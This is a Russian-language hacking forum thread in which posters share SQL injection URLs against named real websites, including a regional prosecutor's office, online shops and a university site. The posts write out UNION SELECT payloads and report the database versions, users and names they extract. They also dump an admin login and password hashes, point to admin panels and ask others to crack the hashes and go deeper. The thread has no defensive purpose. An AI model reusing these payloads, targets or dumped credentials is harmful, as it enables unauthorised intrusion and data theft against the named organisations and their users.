наткнулся на: Code: http://line.kz/reviews/?cat=13&id=www.site.com/view.asp?id=-1+union+select+1,2,3,4,5,6,7,8-- выдает Microsoft OLE DB Provider for SQL Server ошибка '80040e10' дошел до Code: http://line.kz/reviews/?cat=13&id=www.site.com/view.asp?id=-1+union+select+1,2,3,4,5,6,7,8*+from+msysobjects+in+'.' выдал : Îòñóòñòâóåò çíà÷åíèå äëÿ îäíîãî èëè íåñêîëüêèõ òðåáóåìûõ ïàðàìåòðîâ. может еще кто глубже капнет? а то интересно, че там в конце тунеля! )))
Пр0kуратуpa Пермск0го Края http://www.prokuror.perm.ru/posts?id=-1+union+select+1,2,3,version(),5,DATABASE(),7,8,9--+ information_schema закрыта, или ее тупо нет, ибо версия 4, таблу с админами так и не нашел, админка в /admin/
Legis.krsn.ru - PR5 ~1.3к 4 ветка.. Arabwestreport.info - PR5 ~1.3к /webmanager Co.dona-ana.nm.us - PR5 ~1.3к Rockportartcenter.com - PR4 ~0.7к
http://carepa.org/detail.php?uid=-53+union+select+1,2,3,4,5-- Не могу раскрутить, через order by показывает что там от 1 до 5 колонок но постоянно ошибка вылазит
Это значит скорее всего что параметр используется больше, чем в одном запросе, первый запрос прокатывает с 5 полями, второй выдает ошибку. В таких случаях или перебор, или ищи другой инъект. (Инъект не приходит в одиночку =) например вот нормальная инъекция с этого сайта Code: http://carepa.org/mixers.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1--+ UPD: данные админа Code: http://carepa.org/mixers.php?id=-1+union+select+1,username,3,4,5,6,7,8,9,0,password+from+rc_admin--+ http://carepa.org/admin/ admin $1$.y3.ta3.$Jk5.iyx3OT9IZlhJ8CKQy/ КТо скажет что за хэш?
http://ishare.rediff.com/music_category.php?id=-40+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a3a,version(),user(),database())-- 5.1.30-log [email protected] imusic http://www.fitnesstogether.com/news_view.php?id=-40+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,version(),user(),database())-- 5.0.27-community-nt admin_suite_user@localhost admin_suite http://www.carli.illinois.edu/reports/prodvett/indiv_prop.php?id=-40+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,version(),user(),database()),8,9,10,11,12,13,14,15,16/* 5.0.38-Ubuntu_0ubuntu1.4-log signupsuper@localhost suggest http://www.herpconstrust.org.uk/gallery/pic.php?id=21+union+select+1,2,concat_ws(0x3a3a,version(),user(),database()),4,5,6,7/* 4.1.19-standard-log herpconstrust@localhost herpconstrust http://www.awards-world.com/art.php?id_article=-22+union+select+1,2,3,user(),5,6,7,8,9--&id_page=21 awardswo_admin@localhost 4.1.22-standard-log awardswo_AWARDSWORLD Всех с наступающим!
Пройдёмся по магазинчикам! http://shopping.sify.com/shopping/category.php?pid=20282+union+select+1,2,concat_ws(0x3a3a,version(),user(),database()),4/*&?vsv=MALLHPBOOKS Database Version: 5.0.45-log Database name: cms User name: [email protected] http://www.cafegadgets.com/advanced_search_result.php?keywords=d2&search_in_description=1&categories_id=&inc_subcat=1&manufacturers_id=-94+union+select+concat_ws(0x3a3a,version(),user(),database())-- 5.0.67-community-log cafe_cafe@localhost cafe_cafeindia Webstore
Code: http://line.kz/reviews/?cat=13&id=1+or+1=(SELECT+TOP+1+id+FROM+vacancy)-- Кто дальше сможет? ))
Code: http://www.amazingsportsphotos.com/shop/insertorder.cfm?CFID=3371&CFTOKEN=53570656+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14-- 5.0.67-community-nt-log Code: http://www.appointmentsatfive.com/insertorder.cfm?CFID=102&CFTOKEN=94729224+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- 5.0.67-community-nt-log
Code: http://shopping.sify.com/shopping/category.php?pid=20282+union+select+1,2,concat_ws(0x3a,userid,Name,Password,Email,Tel_Off,Tel_Res,Mobile,Enable,Creation_Date,Last_Mod_Date),4+from+User_Master+where+id='1'-- admin:F1A61D77BD363820BCAB7093B433360876BDDC34 хэш в пм плз, зарание спс Да, и еще, кто админку нашел?
Дальше смотришь все таблицы в information_schema. Чтобы дальше смотреть используем NOT+IN Ну и так дальше.
"Дайвинг-клуб Мегадайв" Code: http://megadive.ru/index.php?p=5&ti=-1+union+select+1,2,3,version(),5,6,7,8,9,10--
